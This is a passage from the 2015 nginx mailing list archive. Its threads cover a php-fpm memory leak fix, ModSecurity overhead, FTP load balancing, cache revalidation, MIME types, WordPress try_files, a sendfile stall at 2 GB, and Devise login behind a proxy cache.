<5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org> Message-ID: <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org> This my hardware server: Processor Intel Xeon E3 1225v2 Cores/Threads 4 cores/ 4 threads Frequency 3.2 GHz+ RAM 32GB DDR3 Disks 3 x 120 GB SSD ========================================= the config is nginx.conf: #user nginx; # The number of worker processes is changed automatically by CustomBuild, according to the number of CPU core$ worker_processes 4; pid /var/run/nginx.pid; error_log /var/logs//nginx/error.log; #error_log logs/error.log notice; #error_log logs/error.log info; events { include /etc/nginx/nginx-events.conf; } http { include /etc/nginx/mime.types; # access_log /var/log/nginx/access.log main; # For user configurations not maintained by DirectAdmin. Empty by default. include /etc/nginx/nginx-includes.conf; # Supplemental configuration include /etc/nginx/nginx-modsecurity-enable.conf; include /etc/nginx/nginx-defaults.conf; include /etc/nginx/nginx-gzip.conf; include /etc/nginx/directadmin-ips.conf; include /etc/nginx/directadmin-settings.conf; include /etc/nginx/nginx-vhosts.conf; include /etc/nginx/directadmin-vhosts.conf; } ========================================== config for nginx-defaults.conf: default_type application/octet-stream; tcp_nopush on; tcp_nodelay on; sendfile on; log_format bytes '$bytes_sent $request_length'; keepalive_timeout 2; types_hash_max_size 2048; disable_symlinks if_not_owner from=$document_root; server_tokens off; client_max_body_size 1024m; client_body_timeout 3m; client_body_buffer_size 128k; client_header_timeout 20; client_header_buffer_size 3m; large_client_header_buffers 4 256k; send_timeout 20; proxy_connect_timeout 600s; proxy_send_timeout 600s; proxy_read_timeout 600s; proxy_buffer_size 128k; proxy_buffers 4 256k; proxy_busy_buffers_size 256k; fastcgi_send_timeout 600s; fastcgi_read_timeout 600s; server_names_hash_bucket_size 128; server_names_hash_max_size 10240; ssl_dhparam /etc/nginx/ssl.crt/dhparams.pem; ## Anti ddos limit_conn_zone $binary_remote_addr zone=conn_limit_per_ip:10m; limit_req_zone $binary_remote_addr zone=req_limit_per_ip:10m rate=5r/s; ================================ config for nginx-gzip.conf gzip on; gzip_static on; gzip_disable "msie6"; gzip_http_version 1.1; gzip_vary on; gzip_comp_level 6; gzip_proxied any; gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application$ gzip_buffers 16 8k; gzip_min_length 10; gzip_disable "MSIE [1-6]\.(?!.*SV1)"; =================================== config for nginx/directadmin-ips.conf: server { listen xx.xx.xx.xx:80 default_server; // i hide the ip server_name _; root /home/admin/domains/sharedip; index index.html index.htm index.php; include /usr/local/directadmin/data/users/admin/nginx_php.conf; # deny access to apache .htaccess files location ~ /\.ht { deny all; } include /etc/nginx/webapps.conf; } server { listen xx.xx.xx.xx:443 default_server; // i hide the ip server_name _; ssl on; ssl_certificate /etc/nginx/ssl.crt/server.crt.combined; ssl_certificate_key /etc/nginx/ssl.key/server.key; ssl_session_cache shared:SSL:10m; ssl_session_timeout 5m; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; ssl_prefer_server_ciphers on; root /home/admin/domains/sharedip; index index.html index.htm index.php; include /usr/local/directadmin/data/users/admin/nginx_php.conf; # deny access to apache .htaccess files location ~ /\.ht { deny all; } include /etc/nginx/webapps.conf; } =========================== config for directadmin-settings.conf: empty =========================== config for nginx-vhosts.conf server { listen xx.xx.xx.x:80; // i hide the ip listen 127.0.0.1:80; #listen [::1]:80; server_name $hostname xx.xx.xx.xx; / i hide the ip root /var/www/html; index index.html index.htm index.php; #Support UserDir (~/user/) location ~^/~(?.+?)(?/.*)?$ { alias /home/$userdir_user/public_html$userdir_uri; index index.html index.htm index.php; autoindex on; location ~ \.php$ { fastcgi_split_path_info ^(.+\.php)(/.+)$; include /etc/nginx/fastcgi_params; fastcgi_index index.php; #try_files does not work after alias directive if (!-f $request_filename) { return 404; } fastcgi_param DOCUMENT_ROOT /home/$userdir_user/public_html; fastcgi_param SCRIPT_FILENAME $request_filename; fastcgi_pass unix:/usr/local/php54/sockets/$userdir_user.sock; } } # Pass all .php files onto a php-fpm/php-fcgi server. location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; include /etc/nginx/fastcgi_params; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_pass unix:/usr/local/php54/sockets/webapps.sock; } include /etc/nginx/nginx-info.conf; include /etc/nginx/webapps.conf; } # HTTPS server # server { listen xx.xx.xx.xx:443 ssl; / i hide the ip listen 127.0.0.1:443 ssl; #listen [::1]:443 ssl; server_name $hostname xx.xx.xx.xx; / i hide the ip ssl on; ssl_certificate /etc/nginx/ssl.crt/server.crt.combined; ssl_certificate_key /etc/nginx/ssl.key/server.key; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers HIGH:!aNULL:!MD5; ssl_prefer_server_ciphers on; root /var/www/html; index index.html index.htm index.php; #Support UserDir (~/user/) location ~^/~(?.+?)(?/.*)?$ { alias /home/$userdir_user/private_html$userdir_uri; index index.html index.htm index.php; autoindex on; location ~ \.php$ { fastcgi_split_path_info ^(.+\.php)(/.+)$; include /etc/nginx/fastcgi_params; fastcgi_index index.php; #try_files does not work after alias directive if (!-f $request_filename) { return 404; } fastcgi_param DOCUMENT_ROOT /home/$userdir_user/private_html; fastcgi_param SCRIPT_FILENAME $request_filename; fastcgi_pass unix:/usr/local/php54/sockets/$userdir_user.sock; } } # Pass all .php files onto a php-fpm/php-fcgi server. location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; include /etc/nginx/fastcgi_params; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_pass unix:/usr/local/php54/sockets/webapps.sock; } include /etc/nginx/nginx-info.conf; include /etc/nginx/webapps.ssl.conf; } ==================================== config for directadmin-vhosts.conf: for individual clients i think not matter it empty there. ================================= config for: nginx/nginx-info.conf location /nginx_status { # Enable nginx status page stub_status on; # Disable status page logging in access_log access_log off; # Allow access from 127.0.0.1 allow 127.0.0.1; # Deny all the other connections deny all; } ========================= security_mod disabled now. but the config is nginx-modsecurity-enable.conf: ModSecurityEnabled on; ModSecurityConfig /etc/nginx/nginx-modsecurity.conf; ============================ Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260124#msg-260124 From r at roze.lv Tue Jul 7 21:11:39 2015 From: r at roze.lv (Reinis Rozitis) Date: Wed, 8 Jul 2015 00:11:39 +0300 Subject: leaking memory nginx 1.8.0 In-Reply-To: <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org> References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org> <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org> Message-ID: <6622BB01720145F09597076CACC17FB3@MezhRoze> > security_mod disabled now. but the config is > nginx-modsecurity-enable.conf: > > ModSecurityEnabled on; > ModSecurityConfig /etc/nginx/nginx-modsecurity.conf; Did you disable the module just via configuration or did a full vanilla nginx recompile, because the module could be still hooking in requests. Also 2.8.0 seems a bit "oldish" since it's been released more than a year ago https://github.com/SpiderLabs/ModSecurity/releases Besides there are existing / confirmed memory leaks: https://github.com/SpiderLabs/ModSecurity/issues/895 .. and this discussion also might be related: https://github.com/SpiderLabs/ModSecurity/issues/785 rr From r at roze.lv Tue Jul 7 21:20:57 2015 From: r at roze.lv (Reinis Rozitis) Date: Wed, 8 Jul 2015 00:20:57 +0300 Subject: leaking memory nginx 1.8.0 In-Reply-To: <6622BB01720145F09597076CACC17FB3@MezhRoze> References: <3497464.ifCHdAZQAx@vbart-workstation> <2d404d6479feac8d99092ced31ec4eba.NginxMailingListEnglish@forum.nginx.org> <5d04cb1d3c998ac63a035ebd3b87c790.NginxMailingListEnglish@forum.nginx.org> <72628dbac7c21eb822c83bbe8684be3b.NginxMailingListEnglish@forum.nginx.org> <6622BB01720145F09597076CACC17FB3@MezhRoze> Message-ID: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> > nginx recompile, because the module could be still hooking in requests. Did read a bit further in the thread and could even confirm this: "ModSecurity using resources even if it is disabled" https://github.com/SpiderLabs/ModSecurity/issues/644 which leads to "nginx: Returning 500 if SecRuleEngine is set to Off" https://github.com/SpiderLabs/ModSecurity/issues/645 which is kind of fixed in https://github.com/SpiderLabs/ModSecurity/commit/fe14d9df4d590e348a8ee232e4b318fc5e5a87f8 tagged as 2.9.0-rc2 so way after the version you use. rr From zhanght1 at lenovo.com Wed Jul 8 03:02:47 2015 From: zhanght1 at lenovo.com (Felix HT1 Zhang) Date: Wed, 8 Jul 2015 03:02:47 +0000 Subject: Nginx SFTP/FTP loadbalancer Message-ID: <3B8195E42ECF3D4DA1072EF35B4F39F8C13D0D00@CNMAILEX03.lenovo.com> Dears, This is Felix which is from Lenovo.I need your kindly help of nginx. Here is one question of nginx SFTP/FTP loadbalancer. The backend is two machines 10.96.144.195/10.96.144.196 service IP is 10.96.144.197 which have some http,https,SFTP and FTP service. The frontend systems send some data to 10.96.144.195/10.96.144.196 by 10.96.144.197. Now we want to use nginx to do the loadbalancer which dispatch the http,https,SFTP and FTP to 10.96.144.195/10.96.144.196 not by 10.96.144.197. I could configure the nginx.conf to loadbalancer the http and https service. But how to loadbalancer SFTP and FTP service? Could you give me one configuration example for SFTP and FTP service? BR Felix zhang -------------- next part -------------- An HTML attachment was scrubbed... URL: From pchychi at gmail.com Wed Jul 8 04:52:51 2015 From: pchychi at gmail.com (Payam Chychi) Date: Tue, 7 Jul 2015 21:52:51 -0700 Subject: Nginx SFTP/FTP loadbalancer In-Reply-To: <3B8195E42ECF3D4DA1072EF35B4F39F8C13D0D00@CNMAILEX03.lenovo.com> References: <3B8195E42ECF3D4DA1072EF35B4F39F8C13D0D00@CNMAILEX03.lenovo.com> Message-ID: Hi, You would proxy pass to the backend. Lookup how the smtp is done with nginx. Personally i use nginx for http based and haproxy for any other tcp based load balancing, ive had some great success in this method. -- Payam Chychi Network Engineer / Security Specialist On Tuesday, July 7, 2015 at 8:02 PM, Felix HT1 Zhang wrote: > Dears, > This is Felix which is from Lenovo.I need your kindly help of nginx. > Here is one question of nginx SFTP/FTP loadbalancer. > The backend is two machines 10.96.144.195/10.96.144.196 service IP is 10.96.144.197 which have some http,https,SFTP and FTP service. > The frontend systems send some data to 10.96.144.195/10.96.144.196 by 10.96.144.197. > Now we want to use nginx to do the loadbalancer which dispatch the http,https,SFTP and FTP to 10.96.144.195/10.96.144.196 not by 10.96.144.197. > I could configure the nginx.conf to loadbalancer the http and https service. > But how to loadbalancer SFTP and FTP service? > Could you give me one configuration example for SFTP and FTP service? > BR > Felix zhang > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Wed Jul 8 06:22:05 2015 From: nginx-forum at nginx.us (evgeni22) Date: Wed, 08 Jul 2015 02:22:05 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> Message-ID: <02e4952d9952aeb7ae40c7bed77c81d8.NginxMailingListEnglish@forum.nginx.org> "nginx recompile, because the module could be still hooking in requests." security_mod disabled it not tracker after any domains on the server it cant hooking requersts if it not tracking after domains becuse memory leaking only when clients do traffic with domains. i for sure now it not security_mod problem and about version i use mod_security it last one Current rules version 1.11 (Latest version) CWAF plugin version 2.11 (Latest version) i thinking of php-fpm problems with nginx, i google a little and saw people complain about leaking in nginx who have php-fpm Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260130#msg-260130 From nginx-forum at nginx.us Wed Jul 8 06:57:48 2015 From: nginx-forum at nginx.us (evgeni22) Date: Wed, 08 Jul 2015 02:57:48 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> Message-ID: <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org> wondering if it good config in php-fpm pm = ondemand pm.max_children = 10 pm.process_idle_timeout = 60 pm.max_requests = 1000 ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260131#msg-260131 From nginx-forum at nginx.us Wed Jul 8 07:44:32 2015 From: nginx-forum at nginx.us (evgeni22) Date: Wed, 08 Jul 2015 03:44:32 -0400 Subject: leaking memory nginx 1.8.0 In-Reply-To: <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org> References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org> Message-ID: ok the leaking fixed , i will past here for database for other users: that was in my php-fpm.conf pm = ondemand pm.max_children = 10 pm.process_idle_timeout = 60 pm.max_requests = 1000 ============================= after i change it to this conf the leaking stoped. pm = dynamic pm.max_children = 10 pm.start_servers = 5 pm.min_spare_servers = 5 pm.max_spare_servers = 10 pm.max_requests = 500 i only not understand why pm = ondemand doing the leaking, does algorithem in nginx not stable or it php issue ? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260132#msg-260132 From champetier.etienne at gmail.com Wed Jul 8 09:13:40 2015 From: champetier.etienne at gmail.com (Etienne Champetier) Date: Wed, 8 Jul 2015 11:13:40 +0200 Subject: fastcgi retry upstream (transparent php-fpm restart)? Message-ID: Hi, I'm using nginx with 1 php-fpm (via unix socket), and i'm wondering if there is a way to make nginx retry on error, something like fastcgi_next_upstream but for the same upstream. I would like to be able to transparently restart php-fpm and not send some 502 to the clients So, is there a way to make nginx retry the same upstream for X seconds (or retry every Y seconds for max Z attempts or ...) (on errors like "connect() failed (111: Connection refused) while connecting to upstream") ? I'm open to any tricks Thanks in advance Etienne p.s: I already know about atomic/transparent php deployment with "$realpath_root" and multiple docroot ( https://github.com/zendtech/ZendOptimizerPlus/issues/126#issuecomment-24020445 ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Wed Jul 8 12:46:32 2015 From: r at roze.lv (Reinis Rozitis) Date: Wed, 8 Jul 2015 15:46:32 +0300 Subject: leaking memory nginx 1.8.0 In-Reply-To: References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org> Message-ID: <7D583A379A784B85AB0C6ACA270FB588@MezhRoze> > i only not understand why pm = ondemand doing the leaking, does algorithem > in nginx not stable or it php issue ? It contradicts your previous mails about nginx processes being the leak point. php(-fpm) and nginx are separate pieces of software (just communicating via fastcgi protocol) so if the php leaks memory it's a problem on php side (is also very valid considering that not all of the (third-party) php extensions are memory-friendly). rr From frederik.nosi at postecom.it Wed Jul 8 14:33:36 2015 From: frederik.nosi at postecom.it (Frederik Nosi) Date: Wed, 8 Jul 2015 16:33:36 +0200 Subject: leaking memory nginx 1.8.0 In-Reply-To: References: <6077686BD3FB4BC09C0D7ABC52C2B0D4@MezhRoze> <88c5539650bc73f054bfc83a45392a27.NginxMailingListEnglish@forum.nginx.org> Message-ID: <559D34C0.4020504@postecom.it> Hi, On 07/08/2015 09:44 AM, evgeni22 wrote: > ok the leaking fixed , i will past here for database for other users: > > that was in my php-fpm.conf > > pm = ondemand > pm.max_children = 10 > pm.process_idle_timeout = 60 > pm.max_requests = 1000 > > ============================= > after i change it to this conf the leaking stoped. > > pm = dynamic > pm.max_children = 10 > pm.start_servers = 5 > pm.min_spare_servers = 5 > pm.max_spare_servers = 10 > pm.max_requests = 500 Very probably that last setting helped you, from the documentation: pm.max_requests int The number of requests each child process should execute before respawning. This can be useful to work around memory leaks in 3rd party libraries. For endless request processing specify '0'. Equivalent to PHP_FCGI_MAX_REQUESTS. Default value: 0. IMHO It's a bandaid, but works. > > i only not understand why pm = ondemand doing the leaking, does algorithem > in nginx not stable or it php issue ? > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260106,260132#msg-260132 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at nginx.us Thu Jul 9 01:43:33 2015 From: nginx-forum at nginx.us (Alt) Date: Wed, 08 Jul 2015 21:43:33 -0400 Subject: *_cache_revalidate directives Message-ID: <09fab71fe8ea34cccaefbed6e9e49628.NginxMailingListEnglish@forum.nginx.org> Hello, >From the documentation, I don't understand how the fastcgi_cache_revalidate (or scgi_cache_revalidate or proxy_cache_revalidate or uwsgi_cache_revalidate) works. Please, can someone explain what nginx does when cache is enabled and the revalidate directive is set to "on"? Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260148,260148#msg-260148 From arut at nginx.com Thu Jul 9 07:30:48 2015 From: arut at nginx.com (Roman Arutyunyan) Date: Thu, 9 Jul 2015 10:30:48 +0300 Subject: *_cache_revalidate directives In-Reply-To: <09fab71fe8ea34cccaefbed6e9e49628.NginxMailingListEnglish@forum.nginx.org> References: <09fab71fe8ea34cccaefbed6e9e49628.NginxMailingListEnglish@forum.nginx.org> Message-ID: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com> Hello, > On 09 Jul 2015, at 04:43, Alt wrote: > > Hello, > > From the documentation, I don't understand how the fastcgi_cache_revalidate > (or scgi_cache_revalidate or proxy_cache_revalidate or > uwsgi_cache_revalidate) works. > Please, can someone explain what nginx does when cache is enabled and the > revalidate directive is set to "on"? Normally, when a cache entry is expired in nginx cache, nginx fetches a replacement from upstream. If cache revalidation is enabled, nginx asks the upstream if the current (expired) entry is still valid using ?If-Modified-Since? and ?If-None-Match? HTTP headers. The upstream can reply with "304 Not Modified" to confirm the validity. In this case the entry remains in cache until it expires again. -- Roman Arutyunyan From nginx-forum at nginx.us Thu Jul 9 07:59:04 2015 From: nginx-forum at nginx.us (Alt) Date: Thu, 09 Jul 2015 03:59:04 -0400 Subject: *_cache_revalidate directives In-Reply-To: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com> References: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com> Message-ID: <2620d3f626dba9186106345859617cf4.NginxMailingListEnglish@forum.nginx.org> Hello Roman, Thanks for the explanation. At which moment this revalidation is executed? When there's a new client request or is it done automatically when a cache entry is about to expire? The nginx's cache manager is deleting expiring cache file, so I'm not sure to understand how it all works. Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260148,260151#msg-260151 From arut at nginx.com Thu Jul 9 08:32:22 2015 From: arut at nginx.com (Roman Arutyunyan) Date: Thu, 9 Jul 2015 11:32:22 +0300 Subject: *_cache_revalidate directives In-Reply-To: <2620d3f626dba9186106345859617cf4.NginxMailingListEnglish@forum.nginx.org> References: <08393E7E-0756-46F5-8A5E-72EDE9BE4FEE@nginx.com> <2620d3f626dba9186106345859617cf4.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello, > On 09 Jul 2015, at 10:59, Alt wrote: > > Hello Roman, > > Thanks for the explanation. > At which moment this revalidation is executed? When there's a new client > request or is it done automatically when a cache entry is about to expire? When there?s a client request. Nginx does not do any background cache updates/revalidations/etc. > The nginx's cache manager is deleting expiring cache file, so I'm not sure > to understand how it all works. Nginx cache manager has nothing to do with cache entry expiration. In fact, it does 2 things: * deletes files which were not accessed for the ?inactive? time * deletes old files to keep cache within ?max_size? http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_cache_path -- Roman Arutyunyan From black.fledermaus at arcor.de Thu Jul 9 09:57:54 2015 From: black.fledermaus at arcor.de (basti) Date: Thu, 09 Jul 2015 11:57:54 +0200 Subject: Do not log "directory index of /foo/bar/ is forbidden" Message-ID: <559E45A2.1070607@arcor.de> Hello, I have found "conditional logging" in http://nginx.org/en/docs/http/ngx_http_log_module.html It seems that it only works on status codes. Is there a way to disable logging for something like: 2015/07/09 11:02:30 [error] 24928#0: *97983 directory index of "/foo/bar/" is forbidden, client: xx.xxx.xx.xx, server: www.example.com, request: "GET / HTTP/1.1", host: "www.example.com" nginx version: nginx/1.9.1 Best Regards, basti From nginx at tengu.ch Fri Jul 10 06:00:06 2015 From: nginx at tengu.ch (=?UTF-8?B?Q8OpZHJpYyBKZWFubmVyZXQ=?=) Date: Fri, 10 Jul 2015 08:00:06 +0200 Subject: Wrong mimetype when served from nginx Message-ID: <559F5F66.2010408@tengu.ch> Hello, I have a small issue with my nginx (1.2.1) configuration: some files are served as "application/octet-stream" while they are detected as "text/plain" by "mimetype " command. File names are just "1", "2", and so on. Is there a way to enforce mimetype for those files? I thought about something like this: location ~ /path/to/file/[0-9]+ { types {} default_type text/plain; } but after that, I get a 404 ? what did I wrong? Thanks for your support! Cheers, C. From nginx-forum at nginx.us Fri Jul 10 11:17:18 2015 From: nginx-forum at nginx.us (Alt) Date: Fri, 10 Jul 2015 07:17:18 -0400 Subject: *_cache_revalidate directives In-Reply-To: References: Message-ID: Hello, Thanks again Roman for the explanation and link! Best Regards Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260148,260179#msg-260179 From reallfqq-nginx at yahoo.fr Fri Jul 10 13:39:20 2015 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Fri, 10 Jul 2015 15:39:20 +0200 Subject: nginx on Debian: dynamic network interfaces In-Reply-To: References: Message-ID: On Wed, May 27, 2015 at 6:40 PM, itpp2012 wrote: > > Will you make everyone using nginx on Debian using > > that > > trick, as soon as they need DNS on a default 'hotplug' interface with > > sysvinit? > > No I'd make everyone use IP addresses with the EBLB I've introduced a while > ago with sources. For a fast acting webservice DNS is outdated, > outperformed > and is only useful for clients. If it was up to me I'd rip dns out > completely from nginx. > ?Then I am one of the many glad that this is not up to you. @nginx Will you do anything to adapt to the new way on handling services asynchronously? ?on Debian or not?? (As a side note, and as reported here multiple times by different people, OpenID through Google does not work, so I was unable to fill up a bug there. Would you provide a way of creating accounts on your PKI?) Thanks, --- *B. R.* -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx at netdirect.fr Fri Jul 10 15:16:31 2015 From: nginx at netdirect.fr (Artur) Date: Fri, 10 Jul 2015 17:16:31 +0200 Subject: try_files setup Message-ID: <559FE1CF.6010703@netdirect.fr> Hello, I'm quite new to the advanced nginx configuration so I will need your help. :) I'm currently working on a nginx + php5-fpm (chrooted) + wordpress setup. My basic setup works fine but I wanted to improve the try_files section. My main concern is to correctly take in charge URIs by nginx or php5-fpm depending on their types and existence. My current setup for wordpress with nice permalinks (http://host/wordpress_page/) : location / { root /content/chroot/htdocs; index index.php index.html index.htm; try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { include fastcgi_params; root /htdocs; fastcgi_pass 127.0.0.1:1234; fastcgi_param SCRIPT_FILENAME $document_root$request_filename; } error_page 404 /404.html; #location = /404.html { # root /usr/share/nginx/html; #} error_page 500 502 503 504 /50x.html; location = /50x.html { root /usr/share/nginx/html; } The main problem is that if I try to get a non existing php file (http://host/nonexisting.php) I get always "No input file specified." fpm error. I'd like to redirect here to a 404 error page instead. In case I call a different non existing file (nonexisting.jpg) I get an error displayed from Wordpress saying this page does not exist. I suppose this is correct in a wordpress setup because of the permalinks setup I described above. Any help will be appreciate. :) -- Best regards, Artur. From mandre at eso.org Fri Jul 10 16:01:30 2015 From: mandre at eso.org (Mathias Andre) Date: Fri, 10 Jul 2015 18:01:30 +0200 Subject: Lost connection after reading 2147479552 bytes with sendfile Message-ID: <20150710160130.GB16679@eso.org> Hi! I've bumped into a strange problem lately, and though I've found a workaround I thought I'd post here to try and understand what the underlying issue can be in case it affects anyone else. The short version is: Running Nginx 1.9.2 on Scientific Linux 6 with a 2.6.32-504.8.1.el6.x86_64 kernel, nginx is configured to serve a large file (4GB) with sendfile enabled, the file download hangs exactly after 2147479552 bytes, after ~ 60s the connection is dropped (presumably because of the default send_timeout). Setting sendfile_max_chunk to 1G fixes the problem Longer version: # Create a random 4G file: mkdir /tmp/test dd if=/dev/urandom of=/tmp/test/bigfile bs=1M count=4096 # Basic NGINX configuration /tmp/nginx.conf: worker_processes 1; daemon off; events { worker_connections 768; } http { sendfile on; access_log /tmp/access.log; error_log /tmp/error.log debug; server { listen 8080 default_server; location / { root /tmp/test/; } } } # Nginx 1.9.2 was compiled by hand: nginx -V nginx version: nginx/1.9.2 built by gcc 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --prefix=/tmp/opt --conf-path=/etc/nginx/nginx.conf --error-log-path=/tmp/error.log --http-log-path=/tmp/access.log --pid-path=/tmp/nginx.pid --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-cc-opt='-O2 -g -pipe -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic' --without-pcre --without-http_rewrite_module --with-debug # Run nginx with the above configuration (non-root user, hence all the # /tmp/ stuff above) nginx -c /tmp/nginx.conf # On the same machine run a wget (auto-retry disabled): $ wget http://localhost:8080/bigfile -O /dev/null -t 1 --2015-07-10 17:02:22-- http://localhost:8080/bigfile Resolving localhost... 127.0.0.1, ::1 Connecting to localhost|127.0.0.1|:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 4294967296 (4.0G) [text/plain] Saving to: ?/dev/null? 49% [===================================================================================> ] 2,147,479,552 --.-K/s in 96s 2015-07-10 17:03:58 (21.4 MB/s) - Connection closed at byte 2147479552. Giving up. # The error logs is visible at: # https://gist.githubusercontent.com/mathiasuk/9022d3458ef373db1775/raw/e483a69aae10805558fefc4eefb381e34bbbeaf9/error-sc6.5.log I tried the same thing on an Ubuntu 14.04.2 without problem, however, in this case the sendfile system call always reads much fewer bytes at a time https://gist.githubusercontent.com/mathiasuk/018e0462d8788288d0d3/raw/error-ubuntu-14.04.02.log : $ grep sendfile /tmp/error-ubuntu-14.04.02.log|head 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @0 2147479552 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 3557719 of 2147479552 @0 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @3557719 2147481257 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 7792477 of 2147481257 @3557719 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @11350196 2147483468 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1833524 of 2147483468 @11350196 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @13183720 2147480856 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1899007 of 2147480856 @13183720 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: @15082727 2147482393 2015/07/10 17:08:51 [debug] 15680#0: *1 sendfile: 1964490 of 2147482393 @15082727 Whereas on the SL6 box sendfile tries to read 2147479552 in one go and nginx then seems to stop there: $ grep sendfile /tmp/error-sc6.5.log 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: @0 2147479552 2015/07/10 17:02:22 [debug] 22749#0: *1 sendfile: 2147479552 of 2147479552 @0 I'm not sure if this is the right place to post this, please point me in the right direction if not :) Let me know if I can provide more information or details. Cheers, Mathias -- * Mathias Andre Web & Advanced Projects Coordinator *E S* European Southern Observatory ESO Education & Public Outreach Department O Karl Schwarzschildstr. 2 * D-85748 Garching Phone : +49 (0)89 3200 6760 Germany Office 246 "For every problem, there is a solution that is simple, neat, and wrong." H. L. Mencken From nginx-forum at nginx.us Fri Jul 10 16:03:54 2015 From: nginx-forum at nginx.us (birimblongas) Date: Fri, 10 Jul 2015 12:03:54 -0400 Subject: Problem with devise and nginx proxy cache Message-ID: <6a6b7926871ac264e516b8b872e50a33.NginxMailingListEnglish@forum.nginx.org> Hi. I have a RoR project which was working just fine. But i've tryied to follow this site and add proxy cache to my nginx config: http://vstark.net/2012/10/21/nginx-unicorn-performance-tweaks/ and devise just won't sign_in anymore. I don't get any errors, just don't sign_in and redirect me to login again. As the autor from the link suggested to someone with same problem as I, i've done this on my nginx conf: location = /users/sign_in{ proxy_pass http://app; proxy_set_header Host $http_host; proxy_ignore_headers Set-Cookie; proxy_ignore_headers Cache-Control; proxy_cache_bypass $http_secret_header; add_header X-Cache-Status $upstream_cache_status; } The same to /login. But devise still won't sign_in. Anyone knows how to solve that? Any more configs so I can skip cache to sign_in? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260188,260188#msg-260188 From nginx-forum at nginx.us Fri Jul 10 18:34:24 2015 From: nginx-forum at nginx.us (c0nw0nk) Date: Fri, 10 Jul 2015 14:34:24 -0400 Subject: Nginx + PHP Windows Network Sharing Uploads locking/slow load time Message-ID: <7aefce195819b48a1e12c9c244a25a5a.NginxMailingListEnglish@forum.nginx.org> So i have Nginx as a web server with PHP running as fastcgi what nginx serves traffic via upstreams. The strange bug i have encountered is the fact when i 